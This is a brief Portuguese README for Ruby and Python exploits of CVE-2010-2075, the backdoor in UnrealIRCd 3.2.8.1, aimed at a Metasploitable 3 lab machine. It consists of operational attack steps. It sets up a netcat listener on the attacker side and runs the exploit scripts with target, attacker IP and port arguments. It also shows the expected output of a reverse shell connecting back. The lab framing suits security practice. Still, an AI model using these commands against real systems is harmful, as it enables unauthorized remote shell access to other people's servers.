
Exploit em Ruby e Python para CVE-2010-2075 direcionado ao UnrealIRCd 3.2.8.1, fornecendo acesso remoto a reverse shell no Metasploitable 3.
No shell do atacante
nc -nlvp 1111
No shell da vítima
ruby exploit.rb 127.0.0.1
Saída esperada no shell do atacante
listening on [any] 1111 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.105] 48144
boba_fett
No shell da vítima
python3 exploit.py -ri 127.0.0.1 -rp 6697 -cmd <command> -li <attacker_ip> -lp <attacker_port>
No shell do atacante
nc -nlvp 1111